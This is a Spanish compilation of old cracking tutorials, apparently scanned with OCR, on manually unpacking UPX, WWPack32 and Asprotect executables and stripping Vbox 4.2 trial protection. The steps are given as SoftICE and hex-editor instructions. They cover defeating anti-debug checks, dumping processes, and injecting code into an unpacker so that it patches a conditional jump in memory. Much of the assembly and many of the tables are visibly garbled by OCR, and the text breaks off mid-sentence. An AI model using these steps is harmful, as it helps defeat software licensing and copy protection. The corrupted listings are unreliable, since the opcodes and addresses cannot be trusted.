no lo haces el simbol loader no saltara. ahora usa el loader y tracea el archivo ,veras que es pequeño. Es el momento de correr 
Upx sobre el y empacarlo por completo usa estos parametros: upx.exe -7 upx1.exe Upx envolvera tu archivo como un virus. 
Carga tu archivo en el simbol-loader y una vez a F-10 podras ver el siguiente codigo: 


:004050A0 60 pushad 

:004050A1 BE00504000 mov esi, 00405000 

:004050A6 8DBE0OOCOFFEFF lea edi, dword ptr [esi+FFFFCO0O] 
:004050AC 57 push edi 

:004050AD 83CDFF or ebp, FFFFFFFF 

:004050B0 EB10 jmp 004050C2 


Podemos ver lo siguiente: pushad empuja todos los registros a la pila , el siguiente mueve 00405000 (el cual es el punto de 
entrada -80h) a ESI , asi que clase de codigo esta entre 00405000 y 00405080 ? He buscado en el hexeditor y encontrado que 
contiene la tabla de importacion y los strings usados en mi prog (upx1).de momento no necesitamos esto. 
000405000+FFFFCOOO = 00401000 Este es el Dword movido a EDI, si has investigado tu prog (como te dije antes) deberias 
ver que este es el punto de entrada original del archivo y tambien la localizacion de memoria donde la rutina desempacadora 
comienza a escribir nuestro empacado (desempacado) codigo.Asi el salto solo sobrepasa algunos NOP*s y entra en la rutina de 
desempacado.Lo siguiente que a menudo hago es buscar la rutina desempacadora y como desempaca mi codigo (no se por que 
, no me culpes) Bpm 00401000 es el breakpoint correcto , tras pulsar F-5 entraras en un loop (en realidad es un subloop) el 
loop de desempacado.Con la ventana de datos activa puedes seguir como el codigo es desempacado y escrito en memoria 
mientras vas pulsando F-10 , como te dije estas en un subloop lo que tomara un buen rato hasta salir de estos loops (Hasta 7 
min.) Te dire que la siguiente instruccion importante es: 004051B4 lea eax,[esi4+eax+00005000] Carga la tabla de importacion 
en EAX. Ahora estamos a punto de entrar en nuestro programa desempacado se cuidadoso y paso a paso F-10 hasta 0040521D 
Sabes que es esto? ¡mp 00401000 (si tu codigo es diferente al mio busca el salto al rededor de 0040521D) Ahora tenemos que 
provocar un loop infinito para volcar el programa , entonces pon en el Ice 


a elp (enter) 
jmp eip (enter) 
y otra vez (enter) 


Ok , ahora salimos del Sice (el programa permanece en un loop infinito en memoria) Abrimos Procdump en la ventana de 
tareas encontramos upx1.exe , clik boton derecho y seleccionamos dump(full) , Ahora abrimos el nuevo archivo volcado con 
PE-Editor y cambiamos el punto de entrada a 00001000 ,Listo para correr , pruebalo. Ahora puedes parchearlo , no deberia ser 
muy dificil, si no eres capaz no puedo imaginar que es lo que has entendido de lo que he explicado hasta ahora... 


Segunda Aproximacion (Insertar nuestro codigo en el archivo empacado) 


Creo que seria mejor explicar primero la teoria,He de decir que esta parte del tute no es para principiantes , Que es la 
redireccion del codigo? Para mi y para muchos en la escena de la redireccion del codigo significa insertar nuestro propio 
codigo en la rutina desempacada de forma que el programa ejecute nuestro codigo y que este parchee el exe.He de admitir que 
lo he hecho un poco mas complicado Primero necesitaremos algo de espacio para insertar nuestro codigo , asi que abrimos el 
archivo con el hexeditor y buscamos un trozo de codigo con muchos ceros (00 00 00 00 00 00) Para mi , un buen sitio esta en 
00405230 (lleno de ceros) , lo siguiente es redirigir el codigo de la rutina desempacadora para que salte a nuestro codigo 
insertado en 00405230. 


Explicacion: 


Queremos que la rutina desempacadora primero desempaque el archivo y luego salte a nuestro codigo y parchee el archivo en 
memoria. Cometi una equivocacion la cual hace la cosa un poco mas complicada pero pienso que asi ejercitamos mas el 
cerebro.la equivocacion ocurrio mientras usaba el Hview y buscaba el punto de entrada real del prog. en 0040521D.Hview no 
muestra ¡mp 00401000 (punto de entrada real) Creo que la rutina desmpacadora calcula el punto de entrada real y sobreescribe 
0040521D (espero que me sigas) Por lo tanto no deberia tener sentido cambiar 0040521D ¡mp 004FFBCO (esto es lo que 
muestra hview) a ¡mp 00405230 ya que sera sobreescrito de todas formas.por lo tanto busque un sitio para fijar el salto y 
encontre lo siguiente: 


:004050A0 60 pushad 

:004050A1 BE00504000 mov esi, 00405000 

:004050A6 8DBEOOCOFFEFF lea edi, dword ptr [esi+FFFFCO0O] 
:004050AC 57 push edi 

:004050AD 83CDFF or ebp, FFFFFFFF 

:004050B0 EB10 jmp 004050C2 -->here 


Recuerdas este salto? Tambien lo encontre con hview y por lo tanto lo cambie a: ¡mp 00405230 Alguien podria gritar ahora ya 
que esto cambiaria el codigo siguiente pero UPX tiene una agradable caracteristica, despues ese salto sera un puñado de NOP's 
. para facilitar el cambio de opcodes ¡mp 00405230 es E9 BF B1 BF FF Aplica estos cambios con la ayuda de hview.Mediante 
este codigo se llega a 004050BO y sesalta a 00405230 Si, estas en lo cierto aqui no hay nada (de momento) solo algun 
mov[eax],al... lo que señala a nuestros 00 00 00 00's Lo siguiente que hemos de cambiar es 0040521D ¡mp 00401000 por ¡mp 
00405260 Preguntas por que? Bien , despues de desempacar debe saltar al punto de entrada real pero tenemos que correr 
primero nuestro parche por lo tanto no saltaremos a 00401000 sino a 00403260 (donde hemos añadido nuestro parche) 
cambiando el salto por jmp 00405260 cuyo opcode seria EB 41 Pero en 00405260 hay algo como EB 43 FF 32 BC lo cual 
parchearemos con EB 41 00 00 00 para sobreescribirlo totalmente. En Asm la rutina que sobreescribe seria como sigue: 


00405230 66C7051D524000EB41 mov word ptr[0040521d], 41EB 
00405239 66C7051F5240000000 mov word ptr[0040521f], 0000 
00405242 C6052152400000 mov byte ptr[00405221], 00 
00405249 E974FEFFFF jmp 004050C2 


Ok espero que entiendas las tres primeras lineas (recuerda el orden inverso de la primera linea) Esto parchea el ¡mp00401000 
por ¡mp 00405260 La ultima linea salta a 00405242 , mirando un poco mas arriba de la tabla amarilla 00405242 es el comienzo 
de la rutina desempacadora. 

Sumario de todo lo hecho: Parcheamos un salto de ¡mp 00405242 a ¡mp 00405230 


Insertamos nuestro codigo el cual parchea el prog. real de 00401000 a 00405260 Imagina el programa corriendo.. salta a 
nuestra primera rutina parchea el salto , vuelve a saltar a la rutina desempacadora y finalmente alcanza el salto en 0040521D 


saltando a 00405260 


Ahora añadimos la segunda rutina que parchea el programa en memoria Vamos a 00405260 insertando: 


00405260 C6051210400074 mov byte ptr[00401012],74 
00405267 E974FEFFFF jmp 00401000 


La primera linea parchea el ¡nz por jz y la segunda salta al real prog. Ahora tienes un ejecutable empacado/desempacado pero 
este es el punto en que tienes el archivo parcheado Tras haberlo hecho temporalmente con Sice toma los opcodes marcados en 


azul e insertalos con la ayuda de Hview. Ahora seran permanentes. 
Agradecimientos: 


Volatility 
Lord Soth 
Lucifer 48 
Tornado 
Acid_Burn 
Risc 
Pain 
yte_ 
LaZaRuS 
RevX 
knotty 
Warezpup 
and all i forgot :( sorry 


Nota del Traductor: este doc es mejor visto en notepad y con el ajuste de línea, alguna duda en cuanto a algo que no te queda claro, enviame un email y trataré de explicarlo, ojo, mas que nada con la traducción. 


Echando Vbox fuera del paraíso 


hola! 
queria hacer algo "especial" antes de unirme a las fuerazas militares, para pelear por la paz en Austria. *suspiros* Llamamos a pocas personas sin experiencia con armas viejar al ejercito, aunque todos sabemos incluso que un grupo de terroristas pueden ganar una guerra contra Austria. 
De cualquier forma, eso es otro tema del que no queremos discutir aquí. Este ensayo describe como romper vbox 4.2 fuera de un programa que está empacado con él. 


herramientas necesarias 

AMARA MM AMARA RARA nn 

*HHherramientas standard (softice,procdump....) 

Htun debugger que autmoaticamente pare en un int3 como TurboDebugger 
Htun programa empacado con vbox o hacer uno propio y empacarlos 


asumo que tienes estas herramientas en casa...porque no se las direcciones de donde obtenerlas :) jeje 


comencemos 
AMAARARAAA 


a.) el molesto truco anti-debug 


inicia tu OS con SoftICE activado. Carga tu programa en TurboDebugger y correlo (F9). rompera en un int3. Mira si y di y verás los valores mágicos 
HComo trabaja el truco anti-debug: vbox fija SEH y entonces llama a nuestro int3 

HHsi SICE está presente manejará el int3 sin levantar una *texcepcion, por lo tanto, vbox sabe si SoftICE está instalado. Si una excepción +tse levanta el programa continua normalmente. 

* 

Carga el programa en el Symbol loader. Ahora fija un breakoint en la localidad que escribiste. Pero no uses bpx debido al chequeo CRC. 

Usa bpmb <dirección> x. Ahora ejecutalo; de regreso a SoftICE levantamos una excepción. Edita el valor almacenado en [ebp-07] a O escribiendo: ed (ebp-07) O . Esto causará una. Ahora FS y obtendrás ese molesto mensaje temperamental, pero obtendrás un dialogbox. Presiona Try y serás pateado a SICE de nuevo. Otra vez camia el valor en [ebp-07] a O. Antes de presionar f' 


si=4647h:di=4A4Dh). Camina sobre el int3 hasta que pases el ret. Escribe la dirección del salto (imp [ebp-07]). Ahora puedes salir de TurboDebugger. ebp-07 apunta al buffer temporal donde el int3 y otras instrucciones son ejecutadas. Ahora reinicia la compu con SICE activado. 


tenemos que fijar un breakpoint... 


b.)Encontrando el Salto Final 


...Para encontrar el salto final, tenemos que saber que hace el programa despues. Por lo menos podemos asumirlo :). Tiene que conseguir las direcciones de las API's que usamos en nuestro programa. Esto es hecho a través de GetProcAddress. Rompelo usando bpx GetProcAddress . Ahora FS....de nuevo en SoftICE, desactiva todos los breakpoints y sal. del call GetProcAddress usando F12. 
Ahora viene algun tipo de cosa molesta: caminar a través de masas de código :) 

cil....lo acortaré. 

Podrías buscar las opcodes para acortarlo: 

53,53,11.d6,5b,85,c0,74,2c,68,00,80,00 

debería ser algo como esto: 

push ebx 

push ebx 

call esi 


de cualquier forma, encontraras tu forma aquí (1 min para caminar a esa localidad). Rastrea en este call esi de allí un paso entre esto... 
entonces camina, camina, camina hasta que llegues a un call eax y no camines dentro de él... 

el siguiente call es el ultimo en el que vamos a caminar. Rastrea...y encontrarás 

mov ebx,[ebp-14] 

¡mp ebx 

ese es el salto final (ebx es por supuesto, el Punto de Entrada de tu programa) 

jump (escribe ebx). Camina a él, pero no ejecutes el salto. Ahora entra en un loop infinito con 

“aeip' 

“imp eip' 


c.) Descargando el paraíso 


Abre procdump; selecciona el programa desde la lista de tareas; da un click derecho y selecciona full dump: guardalo; abre el pe-edior y camiba el Punto de Entrada (entry point) a lo que viste en ebx (recuerda entrypoint= 'lo que viste en ebx'- 
Ahora solo hazlo mas compatible y abre el archivo en rebuild pe. 


imagebase). 


Ahora tienes un programa si vbox 
diviertanse.... 


Saludos a 


Volatility.TornCdo, LordSoth,Lucifer48,Acid_Burn,Xom,Einride(por ayudarme conseh).Halvar.knotty, WarezPup,icecream,Lazarus(sheepy:),RevXCarckZ 
ABADS, todo Hcracking4newbies, y a todos los que olvidé (quiza muchos, sorry) 


y por supuesto, a previewsystems por desarrollar vbox 


contactame al email: alpine E ImmortalDescendants.com 
o visitanos en — : www.ImmortalDescendants.com 
traductor ¿NG]JoLe[E]" 

goleeuvOhotmail.com 


DESEMPACANDO WWPACK32 VER 1.2.X.XXX 
por Renegado 


AL DESENSAMBLAR UN ARCHIVO EMPAQUETADO NOTAREMOS QUE WWPACK32 LE AÑADE 
UNA NUEVA SECCION: 


«ext RVA: 00000000 Offset: 00000000 Size: 00000000 Flags: 00000000 
RVA: 00000000 Offset: 00000000 Size: 00000000 Flags: 00000000 
data RVA: 00000000 Offset: 00000000 Size: 00000000 Flags: 00000000 
.idata RVA: 00000000 Offset: 00000000 Size: 00000000 Flags: 00000000 
.rsre RVA: 00000000 Offset: 00000000 Size: 00000000 Flags: 00000000 
.reloc RVA: 00000000 Offset: 00000000 Size: 00000000 Flags: 00000000 
.WWP32 RVA: 00000000 Offset: 00000000 Size: 00000000 Flags: 00000000 


PODRIAMOS CALCULAR AHORA EL NUEVO ENTRYPOINT AÑADIENDO EL RVA (DIRECCION VIRTUAL RELATIVA) A LA BASE DE LA IMAGEN (0040000), PERO USANDO UN DESENSAMBLADOR DECENTE COMO IDA PRO YA NO SERA NECESARIO: 


+ - Choose an entry point -- + 
| Name Address 4 | 

| start 00000000 | 

| I 

| I 

+ + 


ASILA SECCION .WWP32 COMIENZA CON: 


-WWP32:00000000 53 public start 

-WWP32:00000000 start proc near 

-WWP32:00000000 push ebx -WWP32:00000000 55 push ebp 
WWP32:00000000 8B ES mov ebp.eax 

-WWP32:00000000 33 DB xor  ebx,ebx 

-WWP32:00000001 EB 60 jmp  short_WWP32_000000 


-WWP32:00000000 0D OA OD 0A 57 57+str->Wwpack32Decompr db ODh,0Ah 
WWP32:00000000 50 61 63 6B 33 32+db ODh,0Ah 

WWP32:00000000 20 64 65 63 6F 6D+db "WWPack32 RUTINA DE DESCOMPRESION... 
WWP32:00000000 70 72 65 73 73 69-+db '(c) 1998 Piotr Warezak and Rafal... 
WWP32:00000000 6F 6E 20 72 6F 75+db ODh,0Ah 


SIGUIENDO EL CODIGO EN .WWP32:00000001 Y TRAZANDO HASTA EL SALTO EL CUAL SALE DE ESTA SECCCION ENCONTRAREMOS LA SECCION CODE. POR SUPUESTO, ES MAS O MENOS LA MISMA PIEZA DE CODIGO EL CUAL NOS LLEVA A LA SECCION CODE: 


_WWP32_XXXXXX: ; CODE XREF 
add [esil, eax 

xor dx, edx 

mov dl, [ebx] 

inc ebx 

emp dl,O 

je short_WWP32_XXXXXX 

add esi,edx 

jmp — short_WWP32_XXXXXX 
_WWP32_XXXXXX: ; CODE XREF 
pop eax 

popa 

pop eax 

mov ebp,eax 

add eax, cs:[ebp+XXXh] 

add eax, XXXh 

pop ebp 

pop ebx 

jmp near ptr_OUR SECTION_XXXXXX 


DE ESTA FORMA LLEGAMOS A NUESTRA SECCION Y ESE ES EXACTAMENTE EL ANTIGUO ENTRYPOINT DEL ARCHIVO DESEMPACADO. 
AHORA NECESITAREMOS RECONSTRUIR LA SECCION CODE DESEMPACADA ANTIGUA. VAMOS A SACAR MAS INFORMACION DE LAS SECCIONES, POR EJEMPLO UTILIZANDO PEWizard 


VSize RVA Size Offset Rel Lines ... 
«code Ox000X2 0x000X3 Ox0000X Ox00000 0x0 0x0 0x0 0x0 
«data 0x00000 0x00000 Ox00000 0x00000 0x0 0x0 0x0 0x0 
.sdata 0x00000 0x00000 Ox00000 OxX00000 0x0 0x0 0x0 0x0 
.seloc 0x00000 0x00000 Ox00000 OX00000 OXO 0x0 0x0 0x0 
.rsre 0x00000 Ox00000 OX00000 OX00000 0x0 0x0 0x0 0x0 
.WWP32 0x00000 0x00000 0x00000 Ox00000 0x0 0x0 0x0 0x0 


EL TAMAÑO FISICO ES 0x0000X Y EL TAMAÑO DESEMPACADO TIENE QUE SER 0x000x2. UTILIZANDO UN DUMPER PODEMOS AHORA SALVAR LA INFORMACION A UN ARCHIVO. EL INICIO DE LA SECCION SIEMPRE ES: 
IMAGE BASE + RVA= 00400000 + 0x000x3 


POR SUPUESTO QUE TENDREMOS QUE CAMBIAR EL TAMAÑO FISICO EN NUESTRO ARCHIVO DUMPEADO Y DE ESTA MANERA TAMBIEN MODIFICAREMOS LOS OFFSETS. 
AHORA YA SABEMOS EL TAMAÑO DE LA SECCION CODE DESEMPACADA. PODEMOS HACER ESTO AÑADIENDO EL OFFSET(DESPLAZAMIENTO) A EL TAMAÑO Y ENTRAR EL RESULTADO COMOM NUEVO DESPLAZAMIENTO, Y ENTONCES UTILIZAREMOS SIEMPRE EL RESULTADO QUE OBTUVIMOS DE LA ULTIMA SUMA COMO OFFSET A AÑADIR A PROXIMA SECCION A LA CUAL LE QUEREMOS CALCULAR EL OFFSET; 


LA CABECERA DEL ARCHIVO TIENE QUE SER RE-ALINEADO AHORA, ESTO PUEDE HACERSE USANDO PE REBUILDER POR EJEMPLO, 

O MODIFICANDO MANUALMENTE LOS OFFSETS CON EL VALOR DADO POR "FILEALIGN" 

PARA TERMINAR EL ALINEAMIENTO TENEMOS QUE DIVIDIR EL TAMAÑO FISICO DEL SEGMENTO DE CODIGO ENTRE EL VALOR DE FILEALIGN, DE ESTA MANERA SE BORRAN LOS ULTIMOS 16 BYTES DE ESTA SECCION. 
ENTONCES RESTAMOS ESTOS 16 BYTES TAMBIEN A LOS OTROS OFFSETS Y EL ALINEAMIENTO ESTA LISTO! 


AHORA CAMBIEMOS EL ENTRYPOINT EN LA CABECERA (DUMPED FILE) CON EL NUEVO ENTRYPOINT QUE CALCULAMOS ANTERIORMENTE, CONVIRTIENDOLO EN UNA RVA USANDO, POR EJEMPLO, AOU. 
RECONSTRUYE EL PE CON LA SECCION DE CODIGO MODIFICADA Y EL ARCHIVO ESTARA DESEMPACADO!!! 


Manual Unpacking de Asprotect 1.0+ 


by LuTiN NoIR 
Published by Tsehp, Aug 2000. 


Traducido por Caos reptante 


I_Introducción 


Christal me ha pedido que rehiciera mi escrito sobre el volcado de PLEditor, que no ha sido ciertamente demasiado explícito. Pero esta vez 
me ha pedido que lo haga sobre otro programa, con el fin de verificar si funciona siempre de la misma manera. Así pues, este ensayo tendrá 
como finalidad obtener un volcado funcional de un programa protegido con Asprotect 1.0 (o superior). De hecho, hay muchas versiones de 
Asprotect y los dos programas presentados aquí no utilizan la misma versión (aunque es casi la misma). Aprovecharé para hablar un poco 
más del propio Asprotec. TeeJi me propuso su ayuda y os explicará una parte del funcionamiento de Asprotect (ver su ensayo). Vamos a 
tratar sobre tres sistemas de volcado: para empezar, el que utilicé sobre PLEditor aunque revisado, corregido y puesto a punto de acuerdo con 
Tsehp. Otro método (de hecho, dos para ser exacto) explicará un medio de reconstruir una tabla de importación. 


Al final de este tutorial os indicaré otros trabajos que podrán ayudaros a comprendelo mejor (Sobre Asprotect, Cdilla y sobre el formato Pe) 


II_Tools 


Softlce 4.01 

IceDump 6.01 

ProcDump 1.6.2 (o Procinfos) 
Ida 4.04 (no imprescindible) 
Winhex 9.4 (u otro) 
Pe-rebuilder (u otro rebuilder) 


TII_1ler método: PLEditor 


En el informe sobre Aspack/Asprotect yo había propuesto un método para obtener un volcado funcional de PLEditor 3.0 build 15.06.2000. 
Había dicho que este método no funcionaba, aunque de hecho, sí lo hace. Voy a hacerlo de nuevo pero de otra manera. Intentaré explicarlo 
más claramente. 

¿Que es Asprotect? Es una protección. Permite incluir en el programa ciertas limitaciones (tiempo, utilización...), anti-debuggers, código 
polimórfico o superposición del código, comprimir o encriptar el programa e impedir el volcado del mismo. Hay igualmente otras funciones 
de las cuales no nos ocuparemos aquí (especialmente se puede encriptar cierta parte del programa que se desencripta con una clave). 

¿Cómo salir adelante? Es sencillo. Cuando se sabe, todo es fácil O ). 

En primer lugar ¿qué es lo que impide el volcado del programa? Asprotect no crea una tabla de importación y una IAT (import address table) 
correcta cuando se efectúa la descompresión del programa en la memoria (una parte de este tutorial está dedicada a ello). 


1) Recogida de información y volcado. 


Lo primero que hay que hacer es mirar las secciones de PLEditor. Esto nos permitirá saber donde Asprotect debería normalmente poner la 
tabla de importación del programa. Para ello, utilizaremos ProcDump y en PE Editor / Sections veremos: 


Name V. Size V. Offset Raw Size R. Offset Charact. 

CODE 000B3000 00001000 00042800 00000400 C0000040 
DATA 00002000 000B4000 00000C00 00042C00 C0000040 
BSS 00002000 000B6000 00000000 00043800 C0000040 


«¡data 
.tls 
.rdata 
.reloc 
.YSrc 
.data 
.data 


00003000 
00001000 
00001000 
0000D000 
00036000 
00015000 
00001000 


000B8000 
000BB000 
000BC000 
000BD000 
000CA000 
00100000 
00115000 


00000200 
00000000 
00000200 
00000000 
0000A200 
00014800 
00000000 


00043800 
00043A00 
00043A00 
00043C00 
00043C00 
0004DE00 
00062600 


C0000040 
C0000040 
C0000040 
C0000040 
C0000040 
C0000040 
C0000040 


Encontramos una sección .idata y es aquí donde se encuentra una tabla de importación (para los exe con secciones .idata). Así pues, la import 
address table corresponde al virtual offset de la sección .idata (B80000). Sabemos entonces que su tabla de importación estará en 4B8000 
(virtual offset + image base). Habrá que poner un breakpoint para cuando escriba en esta parte: bpm 4b8000 w. 


Ahora que sabemos donde va a poner Asprotect la tabla de importación, podemos empezar a tracear el programa. El punto de comienzo del 
mismo está en 500001, ahí es donde se encuentra la primera parte de Asprotect (y donde hay una multicompresión). Pero esta versión 1.0 de 
Asprotect permite descomprimir estas partes en memoria con direcciones distintas. Será necesario evitar esto (thx sword). Para ello, habrá 
que poner un bpx gettickcount y se ejecuta el programa. Aparece el Softlce y pulsamos F12 para volver al código del programa y debemos 
llegar normalmente aquí: 


015F:00500223  C3 
015F:00500224  25FFFFO100 
015F:00500229 EBO4 


015F:0050022B” E8EBO4E9EB 
015F:00500230 FB 
015F:00500231 E950EB04E8 
015F:00500236 EBO4 


015F:00500238 E9EBFBE9E8 
015F:0050023D 0300 
015F:0050023F 0000 


PESSSUOSaY 
FU 


HpPEZ 
So) 
5 


¡SA 
ou" 


00500 
EC390 


ES54 
00500 


EAX, OO01FFFF 


22F 
71B 


ED86 


23C 


E939E 


E28 


EAX, [ 


EAX] 


[EAX] 


E 


<-- llegamos aquí 


Para evitar el cambio de la dirección es necesario poner EAX a 0 (o un valor similar), enseguida se llega al final de la primera zona en 


500028: 


015F:00500C17 E8EBO4E9EB 
015F:00500C1C' FB 
015F:00500C1D  E95BEBO4E8 
015F:00500C22 


El 
tU 
o 
IS 


015F:00500C24  E9EBFBE9C3 


015F:00500C28 C3 
015F:00500C29 BODD 


015F:00500C2B 54 
015F:00500C2C. 004765 
015F:00500C2F. 7454 


(dí 


EC391 


E854F 
00500 
C43A0 


AL,DD 
ESP 


107 


71D 
Cc28 
814 


[EDI+65],AL 


00500C85 


<-- fin de la 1* zona 


Y aquí se pasa a la segunda zona, que se ha descomprimido en la memoria. Se llega a: 


015F:0056407C 90 
015F:0056407D 60 
015F:0056407E E844060000 
015F:00564083  EB44 
015F:00564085 0000 
015F:00564087 0000 
015F:00564089 0000 
015F:0056408B 0000 


015F:0056408D 87DB 


015F:0056408F 90 


0056 
0056 
[EAX 
[EAX 
[EAX 
[EAX 


46C7 
40C9 
],AL 
],AL 
],AL 
],AL 


EBX, 


EBX 


<-- llegamos aquí 


Es necesario tracear hasta el fin de esta segunda zona. Para llegar más rápidamente se puede poner un bpm eip+5bb x. Se llega aquí: 


015F:00564632 0385A0304400 ADD EAX, [EBP+004430A0] 

015F:00564638  5B POP EBX <-- llegamos aquí 
015F:00564639  0BDB OR EBX, EBX 

015F:0056463B 8985D92E4400 MOV [EBP+00442ED9],EAX 

015F:00564641 61 POPAD 

015F:00564642 7508 JNZ 0056464C 

015F:00564644 B801000000 MOV EAX,00000001 

015F:00564649 C20C00 RET 000€ 

015F:0056464C  68B8665500 PUSH 005566B8 

015F:00564651 C3 RET <-- fin de la 2* zona 


Partiendo de 564651 se va hacia la tercera zona de memoria. Vamos allá: 


015F:005566B5 8D4000 LEA EAX, [EAX+00] 

015F:005566B8 55 PUSH EBP <-- aquí estamos 
015F:005566B9 8BEC MOV EBP, ESP 

015F:005566BB  83C4F4 ADD ESP,-0€C 

015F:005566BE E86DFBFEFE CALL 00546230 

015F:005566C3  0F858FO9FFFF JNZ 00547058 

015F:005566C9 E8460EFFFE CALL 00547514 

015F:005566CE E84537FFFE CALL 00549E18 

015F:005566D3  E81C55FFFF CALL 0054BBF4 

015F:005566D8 E8A3AAFFFF CALL 00551180 

015F:005566D8 E8ABAAFFFF CALL 00551180 

015F:005566DD E87609FFFF CALL 00547058 <-- entramos en el call 
015F:005566E2 8BE5 MOV ESP, EBP 

015F:005566E4 5D POP EBP 

015F:005566E5 C20C00 RET 000€ 

015F:005566E8 0000 ADD [EAX],AL 

015F:005566EA 0000 ADD [EAX],AL 

015F:005566EC. 0000 ADD [EAX],AL 

015F:005566EE 0000 ADD [EAX] ,AL 

015F:005566F0 0000 ADD [EAX] ,AL 


He aquí el principio de la tercera zona de memoria de Asprotect, siempre es necesario entrar en el último call para ocuparse del anti- 
debugger. Una vez que se ha entrado en él, se entra en el segundo que se encuentra: 


015F:00555674 8B1574C75500 MOV EDX, [0055C774] 

015F:0055567A  8B45F8 MOV EAX, [EBP-08] 

015F:0055567D E832E6FFEFE CALL 00553CB4 

015F:00555682 8A15DCB65500 MOV DL, [0055B6DC] 

015F:00555688 8B45F8 MOV EAX, [EBP-08] 

015F:0055568B  E890E6FFFE CALL 00553D20 <-- Call anti-debugger 
015F:00555690 8945F4 MOV [EBP-0C],EAX 

015F:00555693 837DF400 CMP DWORD PTR [EBP-0C],00 

015F:00555697 “7428 JZ 005556C1 

015F:00555699 8B45F4 MOV EAX, [EBP-0C] 


El call en 55568B es el anti-debugger, a continuación pone EAX en EBP-0C y mira si es O. Aquí reemplazo el CALL por MOV EAX, 0 (se 
trata simplemente de poner EAX a 0 al volver del call). A continuación se pulsa FS y deberá aparecer de nuevo el Softlce. Ya he hablado al 
principio de poner un bpm 4b8000 w para saber cuando escribirá en la zona de la tabla de importación. Se llega aquí: 


015F:00545709 782A JS 00545735 

015F:0054570B  F3A5 REPZ MOVSD <-- se llega aquí 
015F:0054570D 89c1 MOV ECX, HAX 

015F:0054570F  83E103 AND ECX, 03 

015F:00545712 F3A4 REPZ MOVSB 

015F:00545714  5F POP EDI 

015F:00545715  5E POP ESI 


015F:00545716 C3 RET 
015F:00545717 8D740EFC LEA ESI, [ECX+ESI-04] 
015F:0054571B 8D7COFFC LEA EDI, [ECX+EDI-04] 


Entonces, copia lo que hay en ESI a EDI. Según esto, EDI= 4B8004 y ESI= C72824. Aquí copia ceros hacia la zona donde debería estar la 
tabla de importación. Pero, ¿cómo es que utiliza una zona en C70000? Hay que ver con el Softlce lo que hay: 


0167:00C72500 97 1F FB 4D B4 B2 65 77-1B 59 3D 6C ED E4 00 DO. ...M..ew.Y=1.... 
0167:00C72510 88 0B 00 01 69 6D 6D 33-32 2E 64 6C 6C 00 01 18 ....imm32.dll... 
0167:00C72520 8C 90 8F 6D 2A 4B FO E9-95 CE F8 38 EC 02 E5 C9 ...m*K..... ads 
0167:00C72530 CB 82 44 A9 C1 4D E5 EA-01 17 8C 90 8F 6D 2A 4B. ..D..M....... m*K 


Es extraño encontrar referencias a DLLs. Hay que tenerlo en cuenta. Se puede quitar el breakpoint de escritura, ya que va a seguir 
escribiendo pero no nos va a llevar a ninguna parte. Hay que seguir traceando (F10) para llegar al punto en que Asprotect cede el turno al 
programa de descompresión en memoria. Normalmente, se llega aquí: 


015F:00555DE9 8B4508 MOV EAX, [EBP+08] 

015F:00555DEC  8B10 MOV EDX, [EAX] 

015F:00555DEE 8B4508 MOV EAX, [EBP+08] 

015F:00555DF1  8B401C MOV EAX, [EAX+1C] 

015F:00555DF4  E887F6FFFE CALL 00555480 <-- se llega aquí 
015F:00555DF9  5EF POP EDI 

015F:00555DFA  5E POP ESI 

015F:00555DFB  5B POP EBX 

015F:00555DFC. 5D POP EBP 

015F:00555DFD C20400 RET 0004 


Bien, se reconoce fácilmente este call por el hecho de que recupera el valor de los registros, inmediatamente después. Es necesario entrar, si 
no, el programa se lanza. Enseguida se llega aquí: 


015F:005554A4 B854775400 MOV EAX, 00547754 

015F:005554A9 E8AE3CFFFE CALL 0054915C 

015F:005554AE E86DOAFFFE CALL 00545F20 <-- se evita este call 
015F:005554B3 33C0 XOR EAX, EAX 

015F:005554B5  5A POP EDX 

015F:005554B6 59 POP ECX 

015F:005554B7 59 POP ECX 

015F:005554B8 648910 MOV FS: [EAX], EDX 

015F:005554BB EBOA JMP 005554C7 

015F:005554BD E93208FFEFF JMP 00545CF4 


Aquí es necesario evitar el paso por el segundo call, de lo contrario se lanza el programa y lo perdemos. Hay que nopear o bien hacer r eip 
eip+5 cuando se está encima. Un poco más lejos encontramos lo mismo: 


015F:005554D9 B854775400 MOV EAX, 00547754 

015F:005554DE E8793CFFFE CALL 0054915C 

015F:005554E3 E8380AFFFE CALL 00545F20 <-- se evita este Call 
015F:005554E8  33C0 XOR EAX, EAX 

015F:005554EA  5A POP EDX 

015F:005554EB 59 POP ECX 

015F:005554EC. 59 POP ECX 

015F:005554ED 648910 MOV FS: [EAX] , EDX 

015F:005554F0 EBOA JMP 005554FC 

015F:005554F2 E9FDO7FFFE JMP 00545CF4 


Se hace lo mismo, r eip eip+5 o NOPs. Queda aún un doble call, se evita el segundo: 


015F:00555534 648920 MOV FS: [EAX],ESP 


015F:00555537  33C9 XOR ECX, ECX 

015F:00555539 B201 MOV DL, 01 

015F:0055553B  B854775400 MOV EAX, 00547754 

015F:00555540 E8173CFFEFF CALL 0054915C 

015F:00555545 E8D609FFEFF CALL 00545F20 <-- se evita 
015F:0055554A  33C0 XOR EAX, EAX 

015F:0055554C. 5A POP EDX 

015F:0055554D 59 POP ECX 

015F:0055554E 59 POP ECX 


Una vez más se hace r eip eip+5 cuando se está sobre el call. Continuamos traceando hasta llegar aquí: 


015F:00555590 EBE8 JMP 0055557A 

015F:00555592 61 POPAD <-- EAX a EIP 
015F:00555593 EBO1 JMP 00555596 

015F:00555595 E850EB02E9 CALL E95840EA 

015F:0055559A 17 POP ss 

015F:0055559B  E802000000 CALL 005555A2 

015F:005555A0 E91758803D JMP 3DD5ADBC 

015F:005555A5 88C7 MOV BH,AL 

015F:005555A7 55 PUSH EBP 

015F:005555A8 0000 ADD [EAX] ,AL 


Aquí se encuentra el POPAD característico de un final de descompresión. En este momento EAX contiene el puntero EIP del programa 
descomprimido en memoria, un poco más adelante un RET nos envía allí. Pero antes de hacer nada veamos el estado de la zona 4B8000 
donde debería estar la tabla de importación: 


015F:004B8180 F4 49 C7 00 00 4A C7 00-0C 4A C7 00 18 4A C7 00. .l...J...J...J.. 
015F:004B8190 24 4A C7 00 30 4A C7 00-3C 4A C7 00 48 4A C7 00  $J..0J..<J..HJ.. 
015F:004B81A0 54 4A C7 00 60 4A C7 00-6C 4A C7 00 78 4A C7 00 TJ... J..1J..xJ.. 
015F:004B81B0 84 4A C7 00 90 4A C7 00-9C 4A C7 00 AB 4A C7 00. .J...J...J...J.. 


Aquí se encuentran muchas referencias a la zona C7xxxx. Utiliza el mismo principio (aunque de modo distinto) que Cdilla. Para llamar a una 
API hace un call [4B8180], que llama a lo que hay en C749F4 y allí a un código del tipo JMP API. De hecho, es más complejo (ver la parte 
